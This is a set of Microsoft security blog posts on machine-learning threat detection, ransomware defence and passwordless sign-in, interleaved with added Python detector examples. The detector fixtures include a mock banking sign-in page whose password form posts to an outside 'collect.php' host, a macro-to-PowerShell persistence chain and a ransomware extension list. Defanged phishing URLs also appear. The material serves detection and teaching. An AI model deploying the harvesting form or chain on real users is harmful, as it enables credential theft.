Detonation in controlled environments exposes thousands of signals about a file, including behaviors like dropped and downloaded files, registry manipulation for persistence and for storing stolen information, outbound network connections, etc. The volume of detonated threats translates to millions of signals that need to be inspected. To scale protection, we employ machine learning technologies to sort through this massive amount of information and determine a verdict for analyzed files.

Machine learning models examine detonation artifacts along with various signals from the following:

  • Static code analysis
  • File structure anomaly
  • Phish brand impersonation
  • Threat intelligence
  • Anomaly-based heuristic detections from security researchers

Figure 2. Classifying unknown threats using detonation, heuristics, and machine learning

Our machine learning models are trained to find malicious content using hundreds of thousands of samples. These models use raw signals as features with small modifications to allow for grouping signals even when they occur in slightly different contexts. To further enhance detection, some models are built using three-gram models that use raw signals sorted by timestamps recorded during detonation. The three-gram models tend to be more sparse than raw signals, but they can act as mini-signatures that can then be scored. These types of models fill in some of the gaps, resulting in better coverage, with little impact to false positives.
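As an added illustration of the three-gram idea described above (example code, not Office 365 ATP's own models), the block below lightly normalizes raw detonation signals so that equal behaviour groups together across slightly different contexts, sorts them by detonation timestamp, cuts them into 3-grams and scores them as weighted mini-signatures; the detonation log, normalization rules, signature set and weights are all constructed for the example.

```python
"""Three-gram "mini-signatures" over detonation signals.

Added illustration, not Office 365 ATP code. The log, the normalization
rules and the signature weights are constructed; a real system would learn
them from hundreds of thousands of detonated samples.
"""
import re

# Constructed detonation log: (timestamp_ms, signal). Not real telemetry.
DETONATION_LOG = [
    (120, "process_create:C:\\Program Files\\Microsoft Office\\WINWORD.EXE"),
    (340, "macro_exec:AutoOpen"),
    (355, "process_create:C:\\Windows\\System32\\cmd.exe"),
    (360, "process_create:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"),
    (910, "net_connect:198.51.100.23:80"),
    (1300, "file_write:C:\\Users\\alice\\AppData\\Local\\Temp\\a7f3.exe"),
    (1320, "process_create:C:\\Users\\alice\\AppData\\Local\\Temp\\a7f3.exe"),
    (1500, "reg_write:HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\upd"),
]

# Constructed benign detonation: Word opens, saves a document, syncs it.
BENIGN_LOG = [
    (100, "process_create:C:\\Program Files\\Microsoft Office\\WINWORD.EXE"),
    (800, "file_write:C:\\Users\\bob\\Documents\\budget.docx"),
    (950, "net_connect:203.0.113.9:443"),
]

TEMP_FILE = "file_write:c:\\users\\<user>\\appdata\\local\\temp\\<tmp>"
RUN_KEY = "reg_write:hkcu\\software\\microsoft\\windows\\currentversion\\run\\<value>"

# Constructed signature weights: each 3-gram is sparse but precise, so a few
# hits already carry a strong verdict while single signals stay ambiguous.
SIGNATURES = {
    ("macro_exec:autoopen", "process_create:cmd.exe", "process_create:powershell.exe"): 0.6,
    ("process_create:powershell.exe", "net_connect:<ip>", TEMP_FILE): 0.5,
    (TEMP_FILE, "process_create:<tmp>", RUN_KEY): 0.7,
}


def normalize(signal):
    """Collapse context that varies between detonations (user name, temp file
    name, remote address, Run value name) so equal behaviours group together."""
    kind, _, value = signal.partition(":")
    value = value.lower()
    value = re.sub(r"c:\\users\\[^\\]+", r"c:\\users\\<user>", value)
    value = re.sub(r"\\temp\\[^\\]+$", r"\\temp\\<tmp>", value)
    value = re.sub(r"\d{1,3}(\.\d{1,3}){3}(:\d+)?", "<ip>", value)
    if kind == "reg_write":
        value = re.sub(r"\\run\\[^\\]+$", r"\\run\\<value>", value)
    if kind == "process_create":
        value = value.rsplit("\\", 1)[-1]  # keep only the image name
    return f"{kind}:{value}"


def three_grams(log):
    """Order signals by detonation timestamp and emit overlapping 3-grams."""
    ordered = [normalize(sig) for _, sig in sorted(log)]
    return [tuple(ordered[i:i + 3]) for i in range(len(ordered) - 2)]


def score(log, signatures=SIGNATURES):
    """Noisy-OR of the weights of matched 3-grams: returns (score, hit_count)."""
    hits = [signatures[g] for g in three_grams(log) if g in signatures]
    miss = 1.0
    for w in hits:
        miss *= 1.0 - w
    return round(1.0 - miss, 4), len(hits)


def verdict(log, threshold=0.8):
    """Constructed decision threshold on the noisy-OR score."""
    return "malicious" if score(log)[0] >= threshold else "benign"


if __name__ == "__main__":
    for name, log in (("sample", DETONATION_LOG), ("benign", BENIGN_LOG)):
        print(name, score(log), verdict(log))
```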

Machine learning can capture and expose even uncommon threat behavior by using several technologies and dynamic featurization. Features like image similarity matching, domain reputation, web content extraction, and others enable machine learning to effectively separate malicious or suspicious behavior from the benign.

Figure 3. Machine learning expands on traditional detection capabilities

Over time, as our systems automatically process and make a verdict on millions of threats, these machine learning models will continue to improve. In the succeeding sections, we'll describe some interesting malware and phishing campaigns detected recently by Office 365 ATP machine learning models.

Phishing campaigns: Online banking credentials

One of the most common types of phishing attacks uses HTML and document files to steal online banking credentials. Gaining access to online bank accounts is one of the easiest ways that attackers can profit from illicit activities.

The email messages typically mimic official correspondence from banks. Phishers have become very good at crafting phishing emails. They can target global banks but also localize email content for local banks.

The HTML or document attachments are designed to look like legitimate sign-in pages or forms. Online banking credentials and other sensitive information entered into these files or websites are sent to attackers. Office 365's machine learning models detect this behavior, among other signals, to determine that such attachments are malicious and block offending email messages.

Figure 4. Sample HTML files that mimic online banking sign-in pages.
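As an added illustration of one static signal behind the behavior just described (example code, not Office 365 ATP's), the block below parses an HTML attachment, notes which brand it displays, and flags any form with a password field whose action posts to a host outside that brand's domains; the brand table and both sample pages are constructed.

```python
"""Static check for credential-harvesting HTML attachments.

Added illustration, not Office 365 ATP code. A sign-in page that shows one
brand but posts the password to an unrelated host is the static shape of
the behaviour the text describes. Brand table and samples are constructed.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed brand table: phrase shown on the page -> domains the brand really uses.
BRAND_DOMAINS = {
    "contoso bank": {"contosobank.example"},
    "fabrikam drive": {"fabrikamdrive.example"},
}


class FormScanner(HTMLParser):
    """Collects visible text and, for each <form>, its action and whether it
    contains a password input."""

    def __init__(self):
        super().__init__()
        self.text = []
        self.forms = []
        self._form = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._form = {"action": a.get("action") or "", "password": False}
            self.forms.append(self._form)
        elif tag == "input" and self._form is not None:
            if (a.get("type") or "").lower() == "password":
                self._form["password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None

    def handle_data(self, data):
        self.text.append(data)


def host_belongs_to(host, domains):
    return any(host == d or host.endswith("." + d) for d in domains)


def analyze(html):
    """Return a list of (finding, brand, post_host) tuples; empty means no
    static signal. Forms submitted by script need detonation, not this check."""
    scanner = FormScanner()
    scanner.feed(html)
    visible = " ".join(scanner.text).lower()
    brands = [b for b in BRAND_DOMAINS if b in visible]
    findings = []
    for form in scanner.forms:
        if not form["password"]:
            continue
        host = (urlparse(form["action"]).hostname or "").lower()
        for brand in brands:
            if host and not host_belongs_to(host, BRAND_DOMAINS[brand]):
                findings.append(("password_form_posts_off_brand", brand, host))
    return findings


# Constructed phishing attachment: brand text with a form posting to an unrelated host.
PHISH_ATTACHMENT = """<html><body>
<h1>Contoso Bank Online Banking</h1>
<p>Sign in to view your statement.</p>
<form method="post" action="http://203.0.113.77/collect.php">
  <input name="user"><input type="password" name="pass"><input type="submit">
</form></body></html>"""

# Constructed legitimate page: same brand, form posts to the brand's own domain.
LEGIT_PAGE = """<html><body><h1>Contoso Bank Online Banking</h1>
<form method="post" action="https://login.contosobank.example/signin">
  <input name="user"><input type="password" name="pass">
</form></body></html>"""


if __name__ == "__main__":
    print(analyze(PHISH_ATTACHMENT))  # one off-brand finding
    print(analyze(LEGIT_PAGE))        # []
```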

Phishing campaigns: Cloud storage accounts

Another popular example of phishing campaigns uses HTML or document attachments to steal cloud storage or email account details. The email messages imply that the recipient has received a document hosted in a cloud storage service. To open the supposed document, the recipient has to enter their cloud storage or email user name and password.

This type of phishing is very rampant because gaining access to either email or cloud storage opens a lot of opportunities for attackers to access sensitive documents or compromise the victim's other accounts.

Figure 5. Sample HTML files that pose as cloud storage sign-in pages.

Tax-themed phishing and malware attacks

Tax-themed social engineering attacks circulate year-round as cybercriminals take advantage of the different country and region tax schedules. These campaigns use various messages related to tax filing to convince users to click a link or open an attachment. The social engineering messages may say the recipient is eligible for a tax refund, confirm that a tax payment has been completed, or declare that payments are overdue, among others.

For example, one campaign intercepted by Office 365 ATP using machine learning implied that the recipient has not completed tax filing and is subject to a penalty. The campaign targeted taxpayers in Colombia, where tax filing ended in October. The email message aimed to alarm taxpayers by suggesting that they have not filed their taxes.

Figure 6. Tax-themed email campaign targeting taxpayers in Colombia. The subject line translates to: You have been fined for not filing your income tax returns

The attachment is a .rar file containing an HTML file. The HTML file contains the logo of Dirección de Impuestos y Aduanas Nacionales (DIAN), the Colombian tax and customs agency, and a link to download a file.

Figure 7. Social engineering document with a malicious link

The link points to a shortened URL hxxps://bit[.]ly/2IuYkcv that redirects to hxxp://dianmuiscaingreso[.]com/css/sanci%C3%B3n%20declaracion%20de%20renta.doc, which downloads a malicious document.

Figure 8. Malicious URL information

The malicious document carries a downloader macro code. When opened, Microsoft Word issues a security warning. In the document are instructions to Enable content, which executes the embedded malicious VBA code.

Figure 9. Malicious document with malicious macro code

If the victim falls for this social engineering attack, the macro code downloads and executes a file from hxxp:// The downloaded executable file (despite the file name) is a file injector and password-stealing malware detected by Windows Defender AV as Trojan:Win32/Tiggre!rfn.

Because Office 365 ATP machine learning detects the malicious attachment and blocks the email, the rest of the attack chain is stopped, protecting customers at the onset.

Artificial intelligence in Office 365 ATP

As threats rapidly evolve and become increasingly complex, we continuously invest in expanding capabilities in Office 365 Advanced Threat Protection to secure mailboxes from attacks. Using artificial intelligence and machine learning, Office 365 ATP can constantly scale coverage for unknown and emerging threats in real time.

Office 365 ATP's machine learning models leverage Microsoft's wide network of threat intelligence, as well as seasoned threat experts who have a deep understanding of malware, cyberattacks, and attacker motivation, to combat a wide range of attacks.

This enhanced protection from Office 365 ATP contributes to and enriches the integrated Microsoft 365 threat protection, which provides an intelligent, integrated, and secure solution for the modern workplace. Microsoft 365 combines the benefits and security technologies of the Office 365, Windows, and Enterprise Mobility Suite (EMS) platforms.

Office 365 ATP also shares threat signals to the Microsoft Intelligent Security Graph, which uses advanced analytics to link threat intelligence and security signals across Office 365, the Windows Defender ATP stack of defenses, and other sensors. For example, when a malicious file is detected by Office 365 ATP, that threat can also be blocked on endpoints protected by Windows Defender ATP and vice versa. Connecting security data and systems allows Microsoft security technologies like Office 365 ATP to continuously improve threat protection, detection, and response.



Office 365 Threat Research

Here is Homeland Security, black swans, and thwarted cyberattacks

May 9th, 2018

Last week, I had the honor of addressing The Homeland Security Training Institute (HSTI) at the College of DuPage as part of the HSTI Live educational series. The event featured other prominent speakers at the forefront of cybersecurity defense, including:

Dave Tyson, CEO of CISO Insights, a global cybersecurity consultant, and Nicole Darden Ford, Vice President and Chief Information Security Officer of Baxter Healthcare. Dave broke down complex cybersecurity issues, making them relatable to the audience, a skill he's also honed through his other business venture, CEO of Nicole shared her firsthand experiences dealing with the challenges and the successes of a modern CISO in the healthcare industry. Nicole has global responsibility for information security as well as information technology quality compliance and information governance.

I presented findings from the most recent Microsoft Security Intelligence Report v23, diving into themes and specifics behind old and new malware propagated through massive botnets, phishing, and ransomware attacks. And, importantly, I provided advice and guidance on steps organizations can take to help protect themselves and their critical assets.

It was a great set of talks that spawned a lot of interesting dialogs. After the event, I was stopped by someone who asked me why our cyber defenses aren't sophisticated enough to stop all cyberattacks before they penetrate our systems. It's a fair question, especially when you consider the substantial amount of annual investment organizations make in hardware, software, and human capital. For example, it's not uncommon for regulated and larger businesses to have teams dedicated to 24/7, 365 surveillance and monitoring of their systems. Yet, the bad guys still get in, plant malware, compromise proprietary information, and reveal sensitive customer data.

As I thought more deeply about the question of why we can't stop all attacks, I was reminded of Nassim Nicholas Taleb's seminal book The Black Swan: The Impact of the Highly Improbable. Taleb dives into how some negative events, no matter how improbable they are, can cause massive consequences. This holds within cybersecurity too, as demonstrated by, for example, WannaCry. The attack cost organizations across the globe billions of dollars and made headlines for weeks! Yet far fewer people have heard of Bad Rabbit, largely because it was identified and stopped by Windows Defender Antivirus in 14 minutes before it caused widespread damage. Catching new malware isn't easy, but using layered machine learning from device to cloud and sharing that learning across systems rapidly is helping to find and catch new malware more quickly. With Bad Rabbit, after the first device encounter, the cloud protection service used detonation-based malware classification to block the file and protect subsequent users who downloaded the dangerous file.

Another example of rapid intelligent response spoiling a massive attack comes from March of this year. The malware, named Dofoil, was a cryptocurrency miner that exhibited advanced cross-process injection techniques, persistence mechanisms, and evasion methods. Windows Defender AV picked up on behavior-based signals to identify the infection attempts and block more than 80,000 instances of the attack within milliseconds.

What is often overlooked or unseen in all the headlines is that most of our cyber defenses are deeply effective, especially when you consider the sheer number of attacks enterprises face every day. It's easy to lose sight of this when a devastating attack occurs and controls the news narrative. Microsoft threat data shared from partners, researchers, and law enforcement worldwide gives a clearer picture of the massive scale of data we're regularly protecting. In a month, using the Intelligent Security Graph, we're analyzing 400 billion emails, scanning 1.2 billion devices and 18 billion Bing web pages while detecting 5 billion threats. Again, I'm not suggesting we catch everything malicious as billions of pieces of data and hardware are scanned. We don't. Some malware inevitably gets through our protective layers. But when you consider the scale of attacks, and the prominence of digital products and tools in enterprises, it's important to remember that we as an industry of cybersecurity professionals very often get it right. Users all over the world are accustomed to switching on their devices and safely opening hundreds of emails a day, seeing the correct balance in their mobile banking app, and trusting their GPS to accurately guide them from point A to point B. Our digital lives are deeply intertwined with our personal and work lives, and more often than not, they coexist in harmony.

In sum, it's true; the cybersecurity industry cannot claim the ability to stop all cyberattacks. But let's not overlook all of the attacks that are detected and prevented every day. The hardworking cybersecurity professionals, the same ones I shared the stage with at The Homeland Security Training Institute at the College of DuPage, are advancing our capabilities to thwart cybercrimes every day. Yes, we've got work to do, this is an ongoing battle, but the wins and ongoing work deserve to be recognized too.


Securing the modern workplace with Microsoft 365 threat protection – part 3

This post is authored by Debraj Ghosh, Senior Product Marketing Manager, Microsoft 365 Security.

Detecting ransomware in the modern workplace

Over the last two weeks, we have shared with you the roots of Microsoft 365 threat protection and how Microsoft 365 threat protection helps protect the modern workplace from ransomware. This week, we discuss how Microsoft 365 threat protection helps detect ransomware in the modern workplace. Detection is critical for any best-in-class security solution, especially when a user does not use Microsoft Edge and so does not get the benefit of its web protection. In our web-based scenario, the user can access the website through another browser, download the "software update" and infect their machine with ransomware. Microsoft 365 offers detection capabilities across all threat vectors, and figure 1 summarizes the services which help to detect threats.

Ransomware Detection with Microsoft 365:

  • Windows Defender Advanced Threat Protection
  • Azure Advanced Threat Protection
  • Microsoft Cloud App Security
  • Azure Security Center
  • Office 365 Advanced Threat Protection
  • Office 365 Threat Intelligence

Figure 1. Microsoft 365 threat protection helps detect threats to the modern workplace

For example, with ransomware downloads from the web, Windows Defender ATP's (WDATP) next-gen antivirus protection does an initial analysis of the file and sends all suspicious files to a detonation chamber. The file verdict is quickly determined. If a malicious verdict is returned, WDATP immediately begins blocking the threat. Today's most sophisticated ransomware is designed to spread laterally across networks, increasing its potential impact. Fortunately, WDATP enables security operations specialists to isolate machines from the network, stopping threats from spreading. Also, WDATP provides granular visibility into the device ecosystem so that a compromised device can be easily identified. Built-in threat intelligence is leveraged to help detect the latest threats and provide real-time threat monitoring. As we alluded to, signal sharing via the Intelligent Security Graph is a powerful differentiator of Microsoft 365, enabling threat detection across any threat vector. Once WDATP determines the downloaded files are malicious, it shares this signal with the Intelligent Security Graph, enabling our other platforms to become aware of the threat.

The seamless integration, for example, allows admins to pivot directly from the device analysis in WDATP to user profiles in Azure ATP without losing context allowing a detailed investigation of the incident as shown in Figure 2 below.

Figure 2. Signal sharing and event timeline shared between WDATP and Azure ATP

Often, ransomware uses a brute force password method to move laterally through a network, which our Azure ATP service is specifically designed to detect. A brute force password attack may attempt multiple logins until a correct password is used to enter an account. This anomalous behavior would be detected by Azure ATP and, with signals shared from WDATP, the anomaly would be quickly attributed to the ransomware and blocked from being downloaded onto any part of the network (device, user, etc.). Azure ATP enables security operations analysts to investigate the type of intrusions and methods used by attackers to gain privileged access to user identities and provides a clear attack and event timeline. While Azure ATP detects anomalies at the network level, Microsoft Cloud App Security can detect abnormal file and user behavior within native Microsoft cloud apps such as Office 365, as well as third-party cloud applications. To detect ransomware attacks, Microsoft Cloud App Security identifies behavioral patterns that reflect ransomware activity, for example a high rate of file uploads or file deletion activities, coupled with threat intelligence capabilities such as the detection of known ransomware extensions. Microsoft Cloud App Security will alert on these abnormalities using anomaly detection policies that provide out-of-the-box user and entity behavioral analytics (UEBA) and machine learning (ML) capabilities, as well as fully customizable activity policies, enabling SecOps to detect these anomalies instantly. Learn more about how Microsoft Cloud App Security and Azure ATP work in tandem to help detect an actual ransomware attack.
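As an added illustration of the two Cloud App Security signals named above, a burst of uploads or deletions by one user and uploaded names carrying known ransomware extensions (example code, not Microsoft's), the block below runs a sliding-window detector over constructed activity lines; the window, threshold, extension list and log are assumptions.

```python
"""Ransomware activity detection over cloud-app file events.

Added illustration, not Microsoft Cloud App Security code. Window, rate
threshold, extension list and the activity log are constructed.
"""
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed extension list; a real one comes from threat intelligence.
RANSOMWARE_EXTENSIONS = (".locked", ".crypt", ".encrypted")
WINDOW = timedelta(minutes=5)   # sliding window for the rate signal
RATE_THRESHOLD = 20             # events of one type inside WINDOW
TS_FORMAT = "%Y-%m-%dT%H:%M:%SZ"


def parse(line):
    """Line shape: '2018-04-03T09:15:00Z bob@contoso.example FileDeleted Finance/q1.xlsx'"""
    ts, user, action, path = line.split(" ", 3)
    return datetime.strptime(ts, TS_FORMAT), user, action, path


def detect(lines, rate_threshold=RATE_THRESHOLD, window=WINDOW):
    """Return [(user, severity, reasons)] sorted by user. Severity is 'high'
    when both a rate burst and ransomware extensions are seen for the user."""
    events = sorted(parse(line) for line in lines)
    recent = defaultdict(list)   # (user, action) -> timestamps inside window
    bursts = set()               # (user, action) pairs that exceeded the rate
    ext_hits = Counter()         # user -> uploads with a ransomware extension
    for ts, user, action, path in events:
        if action == "FileUploaded" and path.lower().endswith(RANSOMWARE_EXTENSIONS):
            ext_hits[user] += 1
        if action not in ("FileDeleted", "FileUploaded"):
            continue
        q = recent[(user, action)]
        q.append(ts)
        while ts - q[0] > window:   # drop timestamps that fell out of the window
            q.pop(0)
        if len(q) >= rate_threshold:
            bursts.add((user, action))
    alerts = []
    for user in sorted({u for u, _ in bursts} | set(ext_hits)):
        reasons = sorted(action for u, action in bursts if u == user)
        has_burst = bool(reasons)
        if ext_hits[user]:
            reasons.append(f"ransomware_extension x{ext_hits[user]}")
        severity = "high" if has_burst and ext_hits[user] else "medium"
        alerts.append((user, severity, reasons))
    return alerts


def make_sample_log():
    """Constructed activity: bob's account mass-deletes 25 files and re-uploads
    encrypted copies within a minute; alice uploads three ordinary files."""
    start = datetime(2018, 4, 3, 9, 15, 0)
    lines = []
    for i in range(25):
        t = (start + timedelta(seconds=i)).strftime(TS_FORMAT)
        lines.append(f"{t} bob@contoso.example FileDeleted Finance/report{i}.xlsx")
    for i in range(25):
        t = (start + timedelta(seconds=30 + i)).strftime(TS_FORMAT)
        lines.append(f"{t} bob@contoso.example FileUploaded Finance/report{i}.xlsx.locked")
    for i in range(3):
        t = (start + timedelta(minutes=i)).strftime(TS_FORMAT)
        lines.append(f"{t} alice@contoso.example FileUploaded Sales/deck{i}.pptx")
    return lines


if __name__ == "__main__":
    for alert in detect(make_sample_log()):
        print(alert)
```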

Azure Security Center is also connected with WDATP and provides infrastructure level alerts and even provides an investigation path so admins can fully view the threat propagation details. The service includes threat intelligence which maps the threat source and provides the potential objectives of the threat campaign. What happens if an attacker senses that the web-based attack vector is being blocked and pivots to sending the ransomware via email as an attachment download? Microsoft 365 integration is again crucial as WDATP also shares the signal with Office 365 and once our ransomware is identified by WDATP, Office 365 will begin blocking the threat too. With Office 365 ATPs real-time reporting and Office 365 threat intelligence, admins gain full visibility into all users who receive ransomware via email. Both Office ATP and Office threat intelligence services also track threats found in SharePoint Online, OneDrive for Business, and Teams so detection extends to the entire Office 365 suite. With Microsoft 365 threat protection, threats can be easily detected no matter how an attack is launched. Figure 3 shows the new Microsoft 365 Security and Compliance Center which is the hub from where admins can access the information from the different services.

Figure 3. Microsoft 365 Security and Compliance center which connects the Azure, Office 365, and Windows workloads

Next week we conclude our Microsoft 365 threat protection blog series by covering the remediation and education capabilities offered by Microsoft 365 threat protection. We will demonstrate how Microsoft 365 threat protection workloads can help quickly remediate a ransomware attack and also help educate end users on how to behave and react when under attack.

More blog posts from this series:


Securing the modern workplace with Microsoft 365 threat protection – part 2

This post is authored by Debraj Ghosh, Senior Product Marketing Manager, Microsoft 365 Security.

Protecting the modern workplace against Ransomware

Last week, we shared the roots of Microsoft 365 threat protection. This week, we want to share how Microsoft 365 threat protection services work together to help organizations protect themselves. Figure 1 is a graphical representation of the Microsoft advanced threat protection services which secure the attack surface.

Figure 1. Microsoft 365 advanced threat protection services work together to protect the modern workplace from attacks.

We continue with our ransomware scenario. Ransomware restricts data access by encrypting the user's files or locking computers. Victims are required to pay a ransom to regain access to their machine and/or files. Microsoft closely monitors the threat landscape, and our security intelligence provided in figure 2 shows ransomware remains a prevalent and lethal threat type. All forms of ransomware can be launched at an organization through email, the device ecosystem, or through the enterprise infrastructure.

Figure 2. Monthly ransomware and ransomware downloader encounters, July 2016 to June 2017.

With so many different attack vectors, a point service will be unable to mitigate the variety of potential ransomware attacks. Having services that protect specific parts of the attack surface and that can also share signals to alert services protecting other surfaces of the enterprise is the only way to help ensure full and near real-time security. In many ransomware scenarios, users receive an email suggesting a necessary software update, which can be done by downloading an attachment. The attachment will contain a trojan downloader which can run a ransomware payload once opened. Figure 3 shows the Microsoft 365 threat protection services which can help protect the modern workplace from ransomware attacks.

Ransomware Protection with Microsoft 365:

  • Windows Defender Advanced Threat Protection
  • Office 365 Advanced Threat Protection
  • Azure Security Center

Figure 3. Ransomware protection services for M365 threat protection.

All Microsoft 365 threat protection users have email protected with Office 365 ATP, which helps stop unknown advanced threats sent via email. Office ATP will detonate all email attachments, determine if the file is malicious, and remove the file before final delivery of the email to a user mailbox. Additionally, Office ATP will assess links at the time of click, both in the body of an email and embedded in attachments, and detonate them to determine if they point to a malicious website.

Since the attack surface is broad, attacks are often made directly at devices. As such, several new enhancements that help prevent ransomware are built into the latest version of Windows 10, leveraging machine learning and behavior-based technologies which lead the evolution of malware prevention. To directly attack the device, imagine if our attacker creates a website hosting exploit kits containing ransomware. Users visiting the site mistakenly download ransomware directly from the website. In such an event, Microsoft Edge leverages Windows Defender ATP's browser protection capability, which determines if a site is malicious and can block access, helping secure the ransomware entry point.

Ransomware attacks also target workloads running in the cloud. Azure Security Center helps provide visibility into your cloud infrastructure, leveraging machine learning backed by the Intelligent Security Graph to provide actionable alerts and recommendations on mitigating such threats, as shown in figure 4. While none of these services alone can protect the entire modern workplace, together as Microsoft 365 threat protection they give organizations confidence that Microsoft helps reduce threats from all vectors. Next week, we'll demonstrate how Microsoft 365 threat protection services help detect ransomware attacks.

Figure 4. The Azure Security Center Dashboard.

More blog posts from this series:


Building a world without passwords

Nobody likes passwords. They are inconvenient, insecure, and expensive. In fact, we dislike them so much that we've been busy at work trying to create a world without them: a world without passwords.

In this blog, we will provide a brief insight into how we at Microsoft have been thinking about solving this problem along with details on solutions that you can try out today.


When we think about creating a world without passwords, we want to deliver on two key promises:

  1. User promise: End-users should never have to deal with passwords in their day-to-day lives.
  2. Security promise: User credentials cannot be cracked, breached, or phished.

Passwords have been a big part of our digital lives, and to fully get rid of them, not only do we need to address all that is bad with them, we also need to acknowledge all that is good: they are familiar, portable, and easy to provision.


Figure 1. Passwords – Pros vs cons

At its core, our fundamental philosophy is simple: devalue the password, and replace it with something that eradicates its use for the end user and drains its value for an attacker.

Passwords have been a big part of our digital lives. To fully get rid of them, not only do we need to address all that is bad with them, we also need to acknowledge all that is good; they are familiar, portable, and can be used almost everywhere.

So how are we going about it? Well, we break this up into discrete buckets:

Figure 2: Password-less strategy

  1. Develop password-replacement offerings, i.e., replace passwords with a new set of alternatives that address the shortcomings of passwords while embracing their positive attributes.
  2. Reduce user-visible password surface area, i.e., upgrade all experiences related to the entire life-cycle of a user's identity (including provisioning of an account, setting up a brand-new device, using the account/device to access apps and websites, recovery, etc.) and ensure these work with password replacements (#1).
  3. Simulate a password-less world, i.e., enable end users and IT admins to simulate and transition into a password-less world with confidence.
  4. Eliminate passwords from the identity directory, i.e., the final frontier: delete passwords from the identity directory.

For more details, watch Microsoft's Guide for going password-less.

Here's a quick overview of some of the solutions that you can try out today and how they map to the strategy above.

Password-replacement offerings

Windows Hello

Here's a video that provides a quick overview of Windows Hello, how it is more secure than passwords, and some of the newest enhancements.

Windows Hello is being used by over 47 million users worldwide. More than 5,000 businesses have deployed Windows Hello for Business, with adoption on over one million commercial devices.

For more details, refer to

Windows Hello is an excellent replacement for passwords on personal PCs. That said, we acknowledge that there are many scenarios that involve shared PCs used by transient users, where provisioning Windows Hello is not ideal. To that end, we have been working hard on lighting up a series of portable credentials that are more suitable for such shared PC scenarios.

Microsoft Authenticator app

The Microsoft Authenticator app enables users to authenticate to their Microsoft account using their mobile phone. It is built on secure technology similar to that used by Windows Hello, and packages it into a simple app on your mobile device.

Here's a video that provides a quick overview of the Microsoft Authenticator app.

To download the app and learn more, please go to Microsoft Authenticator.

Windows Hello and our mobile Authenticator app are both great alternatives to passwords. To create a world without passwords, we need an interoperable solution that works across all industry platforms and browsers.

Windows Hello and FIDO2 security keys

Microsoft has been aligned with the Fast Identity Online (FIDO) working group from the start. The alliance represents 250 organizations from various industries on a joint mission to replace passwords with an easy-to-use strong credential. With the recent ratification of FIDO2 security keys by the FIDO working group, we're updating Windows Hello to enable secure authentication for many new scenarios.

For more details, please check out our latest blog, Windows Hello and FIDO2 Security Keys enable secure and easy authentication for shared devices.

What's new in the Windows 10 April 2018 Update?

Among many new and exciting features in the Windows 10 April 2018 Update, we set out with the goal to deliver an end-to-end product experience that's password-less ready. With Windows 10 in S mode, we are enabling our cloud users (Managed Service Account or Azure Active Directory) to go through the entire life-cycle of using their Windows 10 PC with S mode enabled without ever having to enter their passwords. That's right. Here's how you can try it out.

Windows 10 in S mode: Password-less!

  1. Set up your Authenticator app

    1. Install the Microsoft Authenticator app on your mobile device.
    2. Set it up with your Managed Service Account (MSA) and/or Azure Active Directory (Azure AD) account.

Note: Upgrade your default way of authenticating from using a password to the Microsoft Authenticator app by clicking "Use the Microsoft Authenticator app instead" on the login page.

Figure 3: Select Microsoft Authenticator as default sign-in option

  2. Set up your Windows 10 PC with S mode enabled

    1. Install the Windows 10 April 2018 Update with S mode enabled
    2. Proceed through OOBE and set up your account
    3. Use the Microsoft Authenticator app to sign in to your account. No passwords required!

Note: If you are prompted for a password on this screen, click the "Use the Microsoft Authenticator app instead" link.

Figure 4: Windows 10 S OOBE with Microsoft Authenticator app

  3. Set up Windows Hello

Figure 5: Windows Hello provisioning

  4. That's it! Your Windows 10 PC is password-less! Just use your device like you normally do.

    1. Access/SSO to your apps and websites will continue to work. No passwords required!

Figure 6: Access apps and websites seamlessly

    2. You will notice that you'll be required to use Windows Hello (PIN, Face, Fingerprint) for signing in to or unlocking your PC. No passwords!

Figure 7: No passwords under Sign in options for Windows

    3. The password credential provider will no longer enumerate for Windows scenarios.

In summary, you will be able to set up a brand-new device, provision Windows Hello, log in, lock/unlock, use your favorite apps and websites without ever having to enter a password!

Security Keys for Windows Hello (Private preview for Azure AD-joined shared PCs)

FIDO2 security keys allow you to carry your credential with you and safely authenticate to an Azure AD-joined Windows 10 shared PC that's part of your organization. A user can walk up to any device belonging to the organization and authenticate in a secure way: no need to enter a username and password or set up Windows Hello beforehand.

See how it works in this video:

The Windows Hello FIDO2 Security Key feature is now in limited preview. Please let us know if you would like to be added to the waitlist.

While we still have a way to go before we can claim victory, with the incredible lineup of products and features in our portfolio along with those in the works, we are confident that we will get there soon. Please send us your comments, questions, and feedback at


Karanbir Singh
Principal Program Manager, Enterprise & Security

First things first: Envisioning your security deployment

This blog post is part of a series that responds to common questions we receive from customers about deployment of Microsoft 365 Security solutions. In this series you'll find context, answers, and guidance for deployment and driving adoption within your organization. Check out our last blog, Accelerate your security deployment with FastTrack for Microsoft 365.

Every successful project begins with a planning phase, and planning a successful Microsoft 365 Security deployment is no different. Before digging into how you will roll out your new security infrastructure, start by asking what you want to achieve from both a business and technical standpoint. We will cover how to onboard with FastTrack for Microsoft 365 in our next blog post.

Do all end users need anytime, anyplace access of data? Do they require access across all devices, or just selected devices? What data do you need to protect? Are different levels of security required for different users or groups? What about compliance considerations and company policies? Do you want your partners and customers to have secure access? This may not even be an option if government regulations restrict what controls you need to put in place.

FastTrack for Microsoft 365 can help work through these and other critical security planning considerations. FastTrack provides end-to-end guidance for planning, onboarding, and driving end user adoption for Microsoft 365, which comprises Enterprise Mobility + Security (EMS), Windows 10, and Office 365.

Based on thousands of customer experiences, we developed a three-step planning approach: Envision, Onboard, and Drive Value. The Envisioning phase can help you lay the groundwork for an effective security deployment plan.

Envisioning is a systematic way to match Microsoft 365 Security features with relevant company goals. It involves identifying and prioritizing relevant scenarios while learning about the tools and resources available as you plan for your rollout. In many ways, this stage is the most critical part of your journey, as you're setting the business goals you'll measure your success against later.

Your Envisioning Checklist

The following checklist provides a few tips that our FastTrack for Microsoft 365 managers and engineers use to help you get your Envision step underway.

  • Know your goals and scenarios
    Decide what specific products and feature sets you want to enable and why by understanding what they will do for your company and your end users. Here are some examples:

    • Do you plan to secure your cloud resources and force users to provide additional verification to access them? For instance, are you thinking about

      • MFA (Multi-Factor Authentication)
      • Mobile Device Management
      • Azure Active Directory Domain Join
      • App access management

    • Are you considering empowering users to manage their own password resets?
